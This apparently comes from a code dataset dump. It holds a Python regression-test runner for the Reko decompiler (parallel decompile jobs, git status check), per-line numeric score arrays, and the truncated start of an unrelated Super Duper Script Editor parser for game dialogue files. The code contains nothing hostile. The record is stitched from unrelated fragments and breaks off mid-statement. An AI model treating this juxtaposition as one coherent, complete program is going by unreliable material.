0.05, 0, 0, 0, 0, 0, 0.0625, 0, 0.058823529411764705, 0, 0, 0, 0, 0.0625, 0, 0, 0, 0, 0.047619047619047616, 0, 0, 0, 0, 0, 0.0625, 0, 0, 0, 0, 0.05, 0, 0, 0, 0, 0, 0.0625, 0, 0, 0, 0, 0.05, 0, 0, 0, 0.0625, 0, 0, 0.05, 0, 0.07692307692307693, 0, 0, 0.0625, 0, 0, 0, 0.0625, 0, 0, 0, 0.07692307692307693, 0.0625, 0, 0, 0, 0.0625, 0, 0, 0.05, 0, 0, 0.1111111111111111, 0, 0, 0.02, 0, 0, 0.06172839506172839, 0.06557377049180328, 0.06451612903225806, 0.05128205128205128, 0.08196721311475409, 0.045454545454545456, 0.039473684210526314, 0.06779661016949153, 0.01694915254237288, 0.06060606060606061, 0.06172839506172839, 0.07407407407407407, 0.02857142857142857, 0, 0.04918032786885246, 0.09375, 0.07352941176470588, 0.0625, 0.08064516129032258, 0.05970149253731343, 0.03896103896103896, 0.06666666666666667, 0.03333333333333333, 0.06349206349206349, 0.06349206349206349, 0.06578947368421052, 0.07407407407407407, 0.02857142857142857, 0.017241379310344827, 0, 0.037037037037037035, 0, 0, 0.013333333333333334, 0, 0, 0, 0.034482758620689655, 0, 0, 0.041666666666666664, 0, 0, 0, 0, 0.009708737864077669, 0, 0, 0.1, 0.07692307692307693, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.12, 0, 0, 0.058823529411764705, 0, 0, 0, 0.058823529411764705, 0, 0, 0, 0.058823529411764705, 0, 0, 0, 0.058823529411764705, 0, 0.02702702702702703, 0, 0, 0.0625, 0, 0.033707865168539325, 0.0576271186440678, 0, 0.037037037037037035, 0, 0, 0.014285714285714285, 0, 0, 0, 0.033816425120772944, 0.2, 0, 0.2, 0.047619047619047616, 0, 0, 0.04, 0, 0, 0, 0, 0.01639344262295082, 0, 0, 0.029787234042553193, 0.023255813953488372, 0.17647058823529413, 0.16666666666666666, 0, 0.04, 0, 0, 0, 0, 0, 0.034482758620689655, 0, 0.013888888888888888, 0, 0.010869565217391304, 0, 0, 0.034482758620689655, 0, 0, 0, 0, 0.03636363636363636, 0, 0, 0, 0.023809523809523808, 0.03773584905660377, 0, 0, 0.0625, 0.01639344262295082, 0, 0, 0, 0.047619047619047616, 0, 0, 0, 0.043478260869565216, 0, 0, 0, 0, 0, 0, 0, 0, 0.020833333333333332, 0, 0, 0.02857142857142857, 0.01639344262295082, 0, 0.03225806451612903, 0.017543859649122806, 0.07692307692307693, 0, 0, 0.06666666666666667, 0, 0.037037037037037035, 0, 0.024390243902439025, 0, 0, 0, 0.1111111111111111, 0, 0.046511627906976744, 0.06666666666666667, 0.03571428571428571, 0, 0, 0, 0, 0.03571428571428571, 0, 0, 0, 0.023255813953488372, 0, 0.0425531914893617, 0.07692307692307693, 0, 0.05, 0.02912621359223301, 0.05555555555555555, 0.02912621359223301, 0.030303030303030304, 0.037037037037037035, 0.047619047619047616, 0.028846153846153848, 0.03125, 0.034722222222222224 ]
571
0.021468
false
#!/usr/bin/python # Run all regression tests on the subjects in the # $(REKO)/subjects directory tree. # Subject binaries in the directory are identified by either: # * having a dcproject file associated with them or # * a subject.cmd file containing reko command lines to execute. from optparse import OptionParser from threading import Thread from datetime import datetime import multiprocessing as mp import os import os.path import re import subprocess import sys import time import fileinput script_dir = os.path.dirname(os.path.realpath(__file__)) os.chdir(script_dir) parser = OptionParser() parser.add_option("-c", "--configuration", dest="configuration", help="define configuration (Debug, Release, etc.)", default="Debug", metavar="CONFIGURATION") parser.add_option("-o", "--check-output", dest="check_output", action="store_true", help="check output files", default=False) parser.add_option("-p", "--platform", dest="platform", help="define platform (x86, x64)", default="x64") parser.add_option("--strip-suffixes", dest="strip_suffixes", help="strip number suffixes from SSA identifiers (yes, no)", default="yes") (options, dirs) = parser.parse_args() if len(dirs) == 0: dirs = [script_dir] (options, args) = parser.parse_args() options.strip_suffixes = (options.strip_suffixes != 'no') reko_cmdline_dir = os.path.abspath(script_dir + "/../src/Drivers/CmdLine") start_dir = os.getcwd() reko_cmdline = os.path.join(reko_cmdline_dir, "bin", options.platform, options.configuration, "decompile.exe") output_extensions = [".asm", ".c", ".dis", ".h"] source_extensions = [".c"] class Job: def __init__(self, dir, rel_pname, exe_and_args): self.dir = dir self.rel_pname = rel_pname self.exe_and_args = exe_and_args # Split a command line, but allow quotation marks to # delimit file names containing spaces. def cmdline_split(s): a = [] inquotes = False sub = "" for c in s: if c.isspace(): if not inquotes: if len(sub): a.append(sub) sub = "" else: sub += c elif c == '"': if not inquotes: inquotes = True else: inquotes = False a.append(sub) sub = "" else: sub += c if len(sub): a.append(sub) return a # Remove output files def clear_dir(dir_name, files): for pname in files: for ext in output_extensions: if pname.endswith(ext): os.remove(os.path.join(dir_name, pname)) def strip_id_nums(dirs): for dir in dirs: for root, subdirs, files in os.walk(dir): strip_id_nums_for_dir(root, files) def strip_id_nums_for_dir(dir_name, files): for pname in files: for ext in source_extensions: if pname.endswith(ext): strip_id_nums_for_file(os.path.join(dir_name, pname)) numbered_id_regexp = re.compile('(?P<id_name>\w+)_\d+') fn_seg_name_regexp = re.compile('(?P<seg_name>fn\w+)_(?P<offset_name>\d+)') def strip_id_nums_for_file(file_name): file = fileinput.FileInput(file_name, inplace=True) for line in file: #remove EOLN line = line[:-1] line = fn_seg_name_regexp.sub('\g<seg_name>-\g<offset_name>', line) print(numbered_id_regexp.sub('\g<id_name>_n', line)) def collect_jobs(dir_name, files, pool_state): needClear = True if dir_name.endswith(".reko"): clear_dir(dir_name, files) needClear = False for pname in files: if pname.endswith(".dcproject"): if needClear: clear_dir(dir_name, files) needClear = False collect_job_in_dir(collect_reko_project, dir_name, pname, pool_state) scr_name = os.path.join(dir_name, "subject.cmd") if os.path.isfile(scr_name): if needClear: clear_dir(dir_name, files) needClear = False collect_job_in_dir(collect_command_file, dir_name, scr_name, pool_state) def collect_job_in_dir(fn, dir, fname, pool_state): oldDir = os.getcwd() os.chdir(dir) fn(dir, fname, pool_state) os.chdir(oldDir) def collect_reko_project(dir, pname, pool_state): return collect_job([reko_cmdline, pname], dir, pname, pool_state) # Remove any comment on the line def strip_comment(line): return re.sub('#.*', '', line) # Find all commands to execute in a subject.cmd file def collect_command_file(dir, scr_name, jobs): f = open("subject.cmd") lines = f.readlines() f.close() if (lines is None): return for line in lines: line = strip_comment(line) exe_and_args = cmdline_split(line) if len(exe_and_args) <= 1: continue exe_and_args[0] = reko_cmdline # Assumes the binary's name is the last item on the command line. collect_job(exe_and_args, dir, exe_and_args[-1], jobs) def collect_job(exe_and_args, dir, pname, jobs): jobs.append(Job(dir, pname, exe_and_args)) def start_jobs(jobs, pool): results = [] for job in jobs: results.append(pool.apply_async(processor, (job.dir, job.rel_pname, job.exe_and_args))) return results # Order jobs by descending weight; long-running jobs will be started first. def schedule_jobs(jobs, weights): for job in jobs: if job.rel_pname in weights: job.weight = weights[job.rel_pname] else: job.weight = 1.0 return sorted(jobs,key=lambda j: j.weight,reverse=True) def processor(dir, rel_pname, exe_and_args): os.chdir(dir) # print("Processor %s %s %s" % (dir, rel_pname, exe_and_args)) banner = os.path.join(os.path.relpath(dir, start_dir), rel_pname) if sys.platform.startswith("linux") or sys.platform == "darwin": exe_and_args.insert(0, "mono") exe_and_args.insert(1, "--debug") # enables line numbers in stack traces output_lines = "=== " + banner + "\n" start = time.time() sys.stderr.write("%s: Starting %s\n" % (datetime.now().strftime("%H:%M:%S.%f"), banner)) proc = subprocess.Popen(exe_and_args, stdout=subprocess.PIPE, universal_newlines=True) out = proc.communicate()[0] new_weight = time.time() - start if "error" in out.lower(): output_lines += "*** " + banner + "\n" output_lines += out return (rel_pname, new_weight, output_lines) def check_output_files(): proc = subprocess.Popen(["git", "status", "."], stdout=subprocess.PIPE, universal_newlines=True) out = proc.communicate()[0] print(out) directoryClean = False if "working directory clean" in out.lower(): directoryClean = True if "working tree clean" in out.lower(): directoryClean = True if directoryClean: print("Output files are the same as in repository") else: print("Output files differ from repository") exit(1) def load_weights(filename): if os.path.isfile(filename): with open(filename) as f: lines = f.readlines() splits= [line.split("|") for line in lines] weights = { path: float(weight) for (path, weight) in splits } return weights else: return {} def save_weights(weights, filename): with open(filename, "w") as f: for k in weights: f.write("%s|%r\n" % (k, weights[k])) TIMEOUT = 120 # seconds WEIGHTS_FILENAME = "subject_weights.txt" if __name__ == '__main__': mp.freeze_support() # Needed to keep Windows happy. start_time = time.time() weights = load_weights(WEIGHTS_FILENAME) jobs = [] for dir in dirs: for root, subdirs, files in os.walk(dir): collect_jobs(root, files, jobs) jobs = schedule_jobs(jobs, weights) pool = mp.Pool(processes=8) queue = start_jobs(jobs, pool) new_weights = {} outputs = [] for (i, result) in enumerate(queue): try: x = result.get(timeout=TIMEOUT) new_weights[x[0]] = x[1] outputs.append(x[2]) except: outputs.append("!!! " + jobs[i].rel_pname + " timed out\n"); for output in sorted(outputs): sys.stdout.write(output) save_weights(new_weights, WEIGHTS_FILENAME) if options.strip_suffixes: print("Stripping SSA identifier numbers") strip_id_nums(dirs) if options.check_output: check_output_files() print("Decompiled %s binaries in %.2f seconds ---" % (len(queue), time.time() - start_time))
[ "#!/usr/bin/python\n", "# Run all regression tests on the subjects in the \n", "# $(REKO)/subjects directory tree.\n", "# Subject binaries in the directory are identified by either:\n", "# * having a dcproject file associated with them or\n", "# * a subject.cmd file containing reko command lines to execute.\n", "\n", "from optparse import OptionParser\n", "from threading import Thread\n", "from datetime import datetime\n", "import multiprocessing as mp\n", "import os\n", "import os.path\n", "import re\n", "import subprocess\n", "import sys\n", "import time\n", "import fileinput\n", "\n", "script_dir = os.path.dirname(os.path.realpath(__file__))\n", "os.chdir(script_dir)\n", "\n", "parser = OptionParser()\n", "parser.add_option(\"-c\", \"--configuration\", dest=\"configuration\",\n", " help=\"define configuration (Debug, Release, etc.)\",\n", " default=\"Debug\", metavar=\"CONFIGURATION\")\n", "parser.add_option(\"-o\", \"--check-output\", dest=\"check_output\",\n", " action=\"store_true\",\n", " help=\"check output files\", default=False)\n", "parser.add_option(\"-p\", \"--platform\", dest=\"platform\",\n", " help=\"define platform (x86, x64)\",\n", " default=\"x64\")\n", "parser.add_option(\"--strip-suffixes\", dest=\"strip_suffixes\",\n", " help=\"strip number suffixes from SSA identifiers (yes, no)\",\n", " default=\"yes\")\n", "(options, dirs) = parser.parse_args()\n", "if len(dirs) == 0:\n", " dirs = [script_dir]\n", "(options, args) = parser.parse_args()\n", "options.strip_suffixes = (options.strip_suffixes != 'no')\n", "\n", "reko_cmdline_dir = os.path.abspath(script_dir + \"/../src/Drivers/CmdLine\")\n", "\n", "start_dir = os.getcwd()\n", "\n", "reko_cmdline = os.path.join(reko_cmdline_dir, \"bin\", options.platform, options.configuration, \"decompile.exe\")\n", "\n", "output_extensions = [\".asm\", \".c\", \".dis\", \".h\"]\n", "source_extensions = [\".c\"]\n", "\n", "class Job:\n", " def __init__(self, dir, rel_pname, exe_and_args):\n", " self.dir = dir\n", " self.rel_pname = rel_pname\n", " self.exe_and_args = exe_and_args\n", "\n", "# Split a command line, but allow quotation marks to\n", "# delimit file names containing spaces.\n", "def cmdline_split(s):\n", " a = []\n", " inquotes = False\n", " sub = \"\"\n", " for c in s:\n", " if c.isspace():\n", " if not inquotes:\n", " if len(sub):\n", " a.append(sub)\n", " sub = \"\"\n", " else:\n", " sub += c\n", " elif c == '\"':\n", " if not inquotes:\n", " inquotes = True\n", " else:\n", " inquotes = False\n", " a.append(sub)\n", " sub = \"\"\n", " else:\n", " sub += c\n", " if len(sub):\n", " a.append(sub)\n", " return a\n", "\n", "# Remove output files\n", "def clear_dir(dir_name, files):\n", " for pname in files:\n", " for ext in output_extensions:\n", " if pname.endswith(ext):\n", " os.remove(os.path.join(dir_name, pname))\n", "\n", "def strip_id_nums(dirs):\n", " for dir in dirs:\n", " for root, subdirs, files in os.walk(dir):\n", " strip_id_nums_for_dir(root, files)\n", "\n", "def strip_id_nums_for_dir(dir_name, files):\n", " for pname in files:\n", " for ext in source_extensions:\n", " if pname.endswith(ext):\n", " strip_id_nums_for_file(os.path.join(dir_name, pname))\n", "\n", "numbered_id_regexp = re.compile('(?P<id_name>\\w+)_\\d+')\n", "fn_seg_name_regexp = re.compile('(?P<seg_name>fn\\w+)_(?P<offset_name>\\d+)')\n", "\n", "def strip_id_nums_for_file(file_name):\n", " file = fileinput.FileInput(file_name, inplace=True)\n", " for line in file:\n", " #remove EOLN\n", " line = line[:-1]\n", " line = fn_seg_name_regexp.sub('\\g<seg_name>-\\g<offset_name>', line)\n", " print(numbered_id_regexp.sub('\\g<id_name>_n', line))\n", "\n", "def collect_jobs(dir_name, files, pool_state):\n", " needClear = True\n", " if dir_name.endswith(\".reko\"):\n", " clear_dir(dir_name, files)\n", " needClear = False\n", " for pname in files:\n", " if pname.endswith(\".dcproject\"):\n", " if needClear:\n", " clear_dir(dir_name, files)\n", " needClear = False\n", " collect_job_in_dir(collect_reko_project, dir_name, pname, pool_state)\n", "\n", " scr_name = os.path.join(dir_name, \"subject.cmd\")\n", " if os.path.isfile(scr_name):\n", " if needClear:\n", " clear_dir(dir_name, files)\n", " needClear = False\n", " collect_job_in_dir(collect_command_file, dir_name, scr_name, pool_state)\n", "\n", "def collect_job_in_dir(fn, dir, fname, pool_state):\n", " oldDir = os.getcwd()\n", " os.chdir(dir)\n", " fn(dir, fname, pool_state)\n", " os.chdir(oldDir)\n", "\n", "def collect_reko_project(dir, pname, pool_state):\n", " return collect_job([reko_cmdline, pname], dir, pname, pool_state)\n", "\n", "# Remove any comment on the line\n", "def strip_comment(line):\n", " return re.sub('#.*', '', line)\n", "\n", "# Find all commands to execute in a subject.cmd file\n", "def collect_command_file(dir, scr_name, jobs):\n", " f = open(\"subject.cmd\")\n", " lines = f.readlines()\n", " f.close()\n", " if (lines is None):\n", " return\n", " for line in lines:\n", " line = strip_comment(line)\n", " exe_and_args = cmdline_split(line)\n", " if len(exe_and_args) <= 1:\n", " continue\n", " exe_and_args[0] = reko_cmdline\n", " # Assumes the binary's name is the last item on the command line.\n", " collect_job(exe_and_args, dir, exe_and_args[-1], jobs)\n", "\n", "\n", "def collect_job(exe_and_args, dir, pname, jobs):\n", " jobs.append(Job(dir, pname, exe_and_args))\n", "\n", "\n", "\n", "def start_jobs(jobs, pool):\n", " results = []\n", " for job in jobs:\n", " results.append(pool.apply_async(processor, (job.dir, job.rel_pname, job.exe_and_args)))\n", " return results\n", "\n", "# Order jobs by descending weight; long-running jobs will be started first.\n", "def schedule_jobs(jobs, weights):\n", " for job in jobs:\n", " if job.rel_pname in weights:\n", " job.weight = weights[job.rel_pname]\n", " else:\n", " job.weight = 1.0\n", " return sorted(jobs,key=lambda j: j.weight,reverse=True)\n", "\n", "def processor(dir, rel_pname, exe_and_args):\n", " os.chdir(dir)\n", " # print(\"Processor %s %s %s\" % (dir, rel_pname, exe_and_args))\n", " banner = os.path.join(os.path.relpath(dir, start_dir), rel_pname)\n", " if sys.platform.startswith(\"linux\") or sys.platform == \"darwin\":\n", " exe_and_args.insert(0, \"mono\")\n", " exe_and_args.insert(1, \"--debug\") # enables line numbers in stack traces\n", " output_lines = \"=== \" + banner + \"\\n\"\n", " start = time.time()\n", " sys.stderr.write(\"%s: Starting %s\\n\" % (datetime.now().strftime(\"%H:%M:%S.%f\"), banner))\n", "\n", " proc = subprocess.Popen(exe_and_args,\n", " stdout=subprocess.PIPE,\n", " universal_newlines=True)\n", " out = proc.communicate()[0]\n", " new_weight = time.time() - start\n", " if \"error\" in out.lower():\n", " output_lines += \"*** \" + banner + \"\\n\"\n", " output_lines += out\n", " return (rel_pname, new_weight, output_lines)\n", "\n", "def check_output_files():\n", " proc = subprocess.Popen([\"git\", \"status\", \".\"],\n", " stdout=subprocess.PIPE,\n", " universal_newlines=True)\n", " out = proc.communicate()[0]\n", " print(out)\n", " directoryClean = False\n", " if \"working directory clean\" in out.lower():\n", " directoryClean = True\n", " if \"working tree clean\" in out.lower():\n", " directoryClean = True\n", " if directoryClean:\n", " print(\"Output files are the same as in repository\")\n", " else:\n", " print(\"Output files differ from repository\")\n", " exit(1)\n", "\n", "\n", "def load_weights(filename):\n", " if os.path.isfile(filename):\n", " with open(filename) as f:\n", " lines = f.readlines()\n", " splits= [line.split(\"|\") for line in lines]\n", " weights = { path: float(weight) for (path, weight) in splits }\n", " return weights\n", " else:\n", " return {}\n", "\n", "def save_weights(weights, filename):\n", " with open(filename, \"w\") as f:\n", " for k in weights:\n", " f.write(\"%s|%r\\n\" % (k, weights[k]))\n", "\n", "TIMEOUT = 120 # seconds\n", "WEIGHTS_FILENAME = \"subject_weights.txt\"\n", "\n", "if __name__ == '__main__':\n", " mp.freeze_support() # Needed to keep Windows happy.\n", "\n", " start_time = time.time()\n", "\n", " weights = load_weights(WEIGHTS_FILENAME)\n", "\n", " jobs = []\n", " for dir in dirs:\n", " for root, subdirs, files in os.walk(dir):\n", " collect_jobs(root, files, jobs)\n", "\n", " jobs = schedule_jobs(jobs, weights)\n", " pool = mp.Pool(processes=8)\n", " queue = start_jobs(jobs, pool)\n", " new_weights = {}\n", " outputs = []\n", " for (i, result) in enumerate(queue):\n", " try:\n", " x = result.get(timeout=TIMEOUT)\n", " new_weights[x[0]] = x[1]\n", " outputs.append(x[2])\n", " except:\n", " outputs.append(\"!!! \" + jobs[i].rel_pname + \" timed out\\n\");\n", " for output in sorted(outputs):\n", " sys.stdout.write(output)\n", "\n", " save_weights(new_weights, WEIGHTS_FILENAME)\n", " if options.strip_suffixes:\n", " print(\"Stripping SSA identifier numbers\")\n", " strip_id_nums(dirs)\n", " if options.check_output:\n", " check_output_files()\n", "\n", " print(\"Decompiled %s binaries in %.2f seconds ---\" % (len(queue), time.time() - start_time))\n" ]
[ 0, 0.0196078431372549, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009009009009009009, 0, 0, 0, 0, 0.09090909090909091, 0, 0, 0, 0, 0, 0, 0, 0.045454545454545456, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03125, 0, 0, 0, 0, 0, 0.04, 0, 0, 0, 0, 0.022727272727272728, 0, 0, 0, 0, 0, 0.05357142857142857, 0.02631578947368421, 0, 0.02564102564102564, 0, 0, 0.047619047619047616, 0, 0.02631578947368421, 0.01639344262295082, 0, 0.02127659574468085, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012195121951219513, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0, 0.019230769230769232, 0, 0, 0, 0, 0, 0.02, 0, 0, 0, 0.04, 0, 0, 0, 0.02127659574468085, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0, 0, 0.010416666666666666, 0, 0, 0, 0.029411764705882353, 0, 0, 0, 0, 0, 0.03333333333333333, 0, 0.022222222222222223, 0, 0, 0, 0, 0, 0.024691358024691357, 0, 0, 0.010752688172043012, 0, 0, 0.03125, 0.030303030303030304, 0, 0, 0, 0, 0, 0, 0, 0.038461538461538464, 0, 0.03125, 0.030303030303030304, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.017857142857142856, 0.02666666666666667, 0, 0, 0, 0, 0.02702702702702703, 0, 0, 0, 0, 0.04, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.0625, 0.0136986301369863, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.010309278350515464 ]
273
0.004129
false
################################################################################ ### Copyright © 2012-2013 BlackDragonHunt ### ### This file is part of the Super Duper Script Editor. ### ### The Super Duper Script Editor is free software: you can redistribute it ### and/or modify it under the terms of the GNU General Public License as ### published by the Free Software Foundation, either version 3 of the License, ### or (at your option) any later version. ### ### The Super Duper Script Editor is distributed in the hope that it will be ### useful, but WITHOUT ANY WARRANTY; without even the implied warranty of ### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ### GNU General Public License for more details. ### ### You should have received a copy of the GNU General Public License ### along with the Super Duper Script Editor. ### If not, see <http://www.gnu.org/licenses/>. ################################################################################ from bitstring import ConstBitStream, BitStream import copy import logging import os from enum import Enum import common from script_pack import ScriptPack from sprite import SpriteId, SPRITE_TYPE from text_format import TEXT_FORMATS, TEXT_ORIENT, TEXT_ALIGN from voice import VoiceId _LOGGER_NAME = common.LOGGER_NAME + "." + __name__ _LOGGER = logging.getLogger(_LOGGER_NAME) NONSTOP_DIR = os.path.join("all", "bin") NONSTOP_LINE_TYPE = Enum("normal", "chatter", "unknown1", "unknown3", "unknown4", "hanron1", "hanron2", "hanron3", "hanron4", "hanron5", "hanron6", "hanron7", "hanron8", "hanron_mc") LINE_TYPE_MAP = { ConstBitStream(hex = "0x00000000"): NONSTOP_LINE_TYPE.normal, ConstBitStream(hex = "0x01000100"): NONSTOP_LINE_TYPE.chatter, ConstBitStream(hex = "0x01000000"): NONSTOP_LINE_TYPE.unknown1, ConstBitStream(hex = "0x03000000"): NONSTOP_LINE_TYPE.unknown3, ConstBitStream(hex = "0x04000000"): NONSTOP_LINE_TYPE.unknown4, ConstBitStream(hex = "0x00000100"): NONSTOP_LINE_TYPE.hanron1, ConstBitStream(hex = "0x00000200"): NONSTOP_LINE_TYPE.hanron2, ConstBitStream(hex = "0x00000300"): NONSTOP_LINE_TYPE.hanron3, ConstBitStream(hex = "0x00000400"): NONSTOP_LINE_TYPE.hanron4, ConstBitStream(hex = "0x00000500"): NONSTOP_LINE_TYPE.hanron5, ConstBitStream(hex = "0x00000600"): NONSTOP_LINE_TYPE.hanron6, ConstBitStream(hex = "0x00000700"): NONSTOP_LINE_TYPE.hanron7, ConstBitStream(hex = "0x00000800"): NONSTOP_LINE_TYPE.hanron8, ConstBitStream(hex = "0x02000000"): NONSTOP_LINE_TYPE.hanron_mc, } DIR_MAP = { "nonstop_01_001.dat": "e01_202_001.lin", "nonstop_01_002.dat": "e01_204_001.lin", "nonstop_01_003.dat": "e01_208_001.lin", "nonstop_01_004.dat": "e01_210_001.lin", "nonstop_01_005.dat": "e01_212_001.lin", "nonstop_01_006.dat": "e01_216_001.lin", "nonstop_01_007.dat": "e01_222_001.lin", "nonstop_01_008.dat": "e01_224_001.lin", "nonstop_01_009.dat": "e01_228_001.lin", "hanron_01_001.dat": "e01_206_001.lin", "hanron_01_002.dat": "e01_214_001.lin", "hanron_01_003.dat": "e01_226_001.lin", "nonstop_02_001.dat": "e02_203_001.lin", "nonstop_02_002.dat": "e02_205_001.lin", "nonstop_02_003.dat": "e02_207_001.lin", "nonstop_02_004.dat": "e02_209_001.lin", "nonstop_02_005.dat": "e02_213_001.lin", "nonstop_02_006.dat": "e02_215_001.lin", "nonstop_02_007.dat": "e02_223_001.lin", "hanron_02_001.dat": "e02_217_001.lin", "hanron_02_002.dat": "e02_225_001.lin", "nonstop_03_001.dat": "", "nonstop_03_002.dat": "", "nonstop_03_003.dat": "", "nonstop_03_004.dat": "", "nonstop_03_005.dat": "", "nonstop_03_006.dat": "", "nonstop_03_007.dat": "", "nonstop_03_008.dat": "e03_235_001.lin", "hanron_03_001.dat": "e03_212_001.lin", "hanron_03_002.dat": "e03_220_001.lin", "nonstop_04_001.dat": "", "nonstop_04_002.dat": "", "nonstop_04_003.dat": "", "nonstop_04_004.dat": "", "nonstop_04_005.dat": "", "nonstop_04_006.dat": "", "nonstop_04_007.dat": "", "nonstop_04_008.dat": "", "nonstop_04_009.dat": "", "nonstop_04_010.dat": "", "hanron_04_001.dat": "e04_208_001.lin", "hanron_04_002.dat": "e04_227_001.lin", "hanron_04_003.dat": "e04_245_001.lin", "nonstop_05_001.dat": "", "nonstop_05_002.dat": "", "nonstop_05_003.dat": "", "nonstop_05_004.dat": "", "nonstop_05_005.dat": "", "nonstop_05_006.dat": "", "nonstop_05_007.dat": "", "hanron_05_001.dat": "e05_204_001.lin", "hanron_05_002.dat": "e05_242_001.lin", "nonstop_06_001.dat": "", "nonstop_06_002.dat": "", "nonstop_06_003.dat": "", "nonstop_06_004.dat": "", "nonstop_06_005.dat": "", "nonstop_06_006.dat": "", "nonstop_06_007.dat": "", "nonstop_06_008.dat": "", "nonstop_06_009.dat": "", "nonstop_06_017.dat": "", "nonstop_14_001.dat": "", "nonstop_14_002.dat": "", "nonstop_14_003.dat": "", "nonstop_14_004.dat": "", "nonstop_14_005.dat": "", "nonstop_14_006.dat": "", "nonstop_14_007.dat": "", "nonstop_14_008.dat": "", "kokoro_09_001.dat": "e09_701_101.lin", "kokoro_09_002.dat": "e09_702_101.lin", "kokoro_09_003.dat": "e09_703_101.lin", "kokoro_09_004.dat": "e09_704_101.lin", "kokoro_09_005.dat": "e09_705_101.lin", "kokoro_09_006.dat": "e09_706_101.lin", "kokoro_09_007.dat": "e09_707_101.lin", "kokoro_09_008.dat": "e09_708_101.lin", "kokoro_09_009.dat": "e09_709_101.lin", "kokoro_09_010.dat": "e09_710_101.lin", "kokoro_09_011.dat": "e09_711_101.lin", "kokoro_09_012.dat": "e09_712_101.lin", "kokoro_09_013.dat": "e09_713_101.lin", "kokoro_09_014.dat": "e09_714_101.lin", "kokoro_09_015.dat": "e09_715_101.lin", } class NonstopLine(): def __init__(self): self.file_num = -1 self.line_type = -1 self.ammo_id = -1 self.converted_id = -1 self.unknown1 = -1 self.weak_point = -1 self.delay = -1 self.orientation = -1 self.in_effect = -1 self.out_effect = -1 self.time_visible = -1 self.x_start = -1 self.y_start = -1 self.velocity = -1 self.angle = -1 self.zoom_start = -1 self.zoom_change = -1 self.shake = -1 self.rot_angle = -1 self.spin_vel = -1 self.speaker = -1 self.char_id = -1 self.sprite_id = -1 self.unknown3 = -1 self.voice_id = -1 self.unknown4 = -1 self.chapter = -1 self.unknown5 = -1 self.unknown6 = -1 def to_data(self): data = \ ConstBitStream(uintle = self.file_num, length = 16) + \ [key for key, value in LINE_TYPE_MAP.iteritems() if value == self.line_type][0] + \ ConstBitStream(uintle = self.ammo_id, length = 16) + \ ConstBitStream(uintle = self.converted_id, length = 16) + \ self.unknown1 + \ ConstBitStream(uintle = self.weak_point, length = 16) + \ ConstBitStream(intle = self.delay, length = 16) + \ ConstBitStream(intle = self.orientation, length = 16) + \ ConstBitStream(intle = self.in_effect, length = 16) + \ ConstBitStream(intle = self.out_effect, length = 16) + \ ConstBitStream(intle = self.time_visible, length = 16) + \ ConstBitStream(intle = self.x_start, length = 16) + \ ConstBitStream(intle = self.y_start, length = 16) + \ ConstBitStream(intle = self.velocity, length = 16) + \ ConstBitStream(intle = self.angle, length = 16) + \ ConstBitStream(intle = self.zoom_start, length = 16) + \ ConstBitStream(intle = self.zoom_change, length = 16) + \ ConstBitStream(intle = self.shake, length = 16) + \ ConstBitStream(intle = self.rot_angle, length = 16) + \ ConstBitStream(intle = self.spin_vel, length = 16) + \ ConstBitStream(uintle = self.char_id, length = 16) + \ ConstBitStream(uintle = self.sprite_id, length = 16) + \ self.unknown3 + \ ConstBitStream(uintle = self.voice_id, length = 16) + \ self.unknown4 + \ ConstBitStream(uintle = self.chapter, length = 16) + \ self.unknown5 + \ self.unknown6 return data class NonstopParser(): def __init__(self): self.script_pack = ScriptPack() self.filename = "" self.magic = None self.lines = [] def save(self, filename): data = BitStream(self.magic) + BitStream(uintle = len(self.lines), length = 16) for line in self.lines: data += line.to_data() with open(filename, "wb") as f: data.tofile(f) def load(self, filename): filename = filename.lower() if not filename in DIR_MAP: _LOGGER.error("Invalid nonstop file: %s" % filename) return self.filename = filename script_dir = DIR_MAP[filename] self.script_pack = ScriptPack(script_dir, common.editor_config.data01_dir) file_order = [] # --- NONSTOP FORMAT --- # XX XX -- ??? # XX XX -- Number of lines (not necessarily files) # # [68 bytes per line] # XX XX -- File number # XX XX XX XX # * 0x00000000 = normal line # * 0x01000100 = chatter # * 0x01000000 = ??? (Only appears in SDR2) # * 0x02000000 = ??? (Only appears in SDR2) # * 0x03000000 = ??? (Only appears in SDR2) # * 0x04000000 = ??? (Only appears in SDR2) # XX XX -- Ammo ID that reacts to this line. # XX XX -- Converted line ID that reacts to this line. # XX XX -- ??? # XX XX -- 1 = has a weak point, 0 = has no weak point # XX XX -- The amount of time before the next line is shown (in sixtieths of seconds (frames?)). # XX XX -- Unknown (Possibly line orientation? Only 0 in the first game, but sometimes 2 in the second.) # XX XX -- Effect used when transitioning text in. # XX XX -- Effect used when transitioning text out. # * 0: fade # * 1: spin in/out # * 2: zoom out # * 3: slide in/out # XX XX -- The amount of the the line stays on-screen (in sixtieths of seconds (frames?)). # XX XX -- Initial X position (text centered around this pos). # XX XX -- Initial Y position (text centered around this pos). # XX XX -- Text velocity. # XX XX -- Angle of motion. # XX XX -- Initial text zoom (in percent). # XX XX -- Change in zoom over time (in percent). # * 90% means it gradually shrinks. # * 100% means it stays the same size the whole time. # * 110% means it gradually grows. # XX XX -- 0 = no shake, 1 = shake # XX XX -- Rotate the text clockwise to this angle. # XX XX -- Text spins clockwise at this rate. # XX XX -- Speaker (00 00 if chatter) # XX XX -- Sprite ID (00 00 if chatter) # XX XX XX XX -- ??? # XX XX -- Voice index (FF FF if chatter) # XX XX -- ??? # XX XX -- Chapter # XX XX XX XX -- ??? (padding?) nonstop = ConstBitStream(filename = os.path.join(common.editor_config.data01_dir, NONSTOP_DIR, self.filename)) self.magic = 